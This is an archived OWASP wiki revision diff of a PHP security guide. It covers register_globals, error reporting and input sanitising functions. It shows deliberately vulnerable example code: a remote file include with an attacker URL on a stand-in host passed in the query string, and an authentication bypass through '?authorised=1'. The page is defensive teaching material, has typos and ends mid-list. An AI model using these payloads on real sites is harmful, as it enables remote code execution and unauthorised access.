This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "PHP Security Leading Practice"
(New page: ===Global Variables=== One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. Appending global variable...) |
(→Global Variables) |
||
| Line 1: | Line 1: | ||
===Global Variables=== | ===Global Variables=== | ||
| − | One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. | + | One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. register_globals has been disabled by default since PHP 4.1.0 |
| − | Appending global variables to the URL may be a way to circumvent authentication. | + | |
| + | Include directives in PHP can be vulnerable if register_globals is enabled. | ||
| + | |||
| + | <?PHP | ||
| + | |||
| + | include "$dir/script/dostuff.php"; | ||
| + | |||
| + | ?> | ||
| + | |||
| + | With register_globals enabled the $dir variable can be passed in via the query string: | ||
| + | |||
| + | ?dir=http://www.haxor.com/gimmeeverything.php | ||
| + | |||
| + | This would result in the $dir being set to: | ||
| + | <?PHP | ||
| + | |||
| + | include "http://www.haxor.com/gimmeeverything.php"; | ||
| + | |||
| + | ?> | ||
| + | |||
| + | Appending global variables to the URL may be a way to circumvent authentication: | ||
| + | |||
| + | <?PHP | ||
| + | if(authenticated_user()) | ||
| + | { | ||
| + | $authorised=true; | ||
| + | } | ||
| + | |||
| + | if($authorised) | ||
| + | { | ||
| + | give_family_jewels() | ||
| + | } | ||
| + | |||
| + | ?> | ||
| + | |||
| + | if this page was requested with register_globals enabled using the following parameter ?authorised=1 in the query string the athentication functionalotu assuems the used is authorised to proceed. | ||
| + | Without register_globals enabled the variable $authorised would not be affected by the $authorised=1 parameter. | ||
===Error handling=== | ===Error handling=== | ||
Revision as of 17:50, 23 October 2007
Global Variables
One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. register_globals has been disabled by default since PHP 4.1.0
Include directives in PHP can be vulnerable if register_globals is enabled.
<?PHP include "$dir/script/dostuff.php"; ?>
With register_globals enabled the $dir variable can be passed in via the query string:
?dir=http://www.haxor.com/gimmeeverything.php
This would result in the $dir being set to:
<?PHP include "http://www.haxor.com/gimmeeverything.php"; ?>
Appending global variables to the URL may be a way to circumvent authentication:
<?PHP
if(authenticated_user())
{
$authorised=true;
}
if($authorised)
{
give_family_jewels()
}
?>
if this page was requested with register_globals enabled using the following parameter ?authorised=1 in the query string the athentication functionalotu assuems the used is authorised to proceed. Without register_globals enabled the variable $authorised would not be affected by the $authorised=1 parameter.
Error handling
If possible check if one has turned off error reporting via php.ini and if "error_reporting" off.
File Manipulation
Good Things to Use
strip_tags(): Removes any HTML from a String nl2br(): Converts new line characters to HTML break "br" htmlspecialchars():
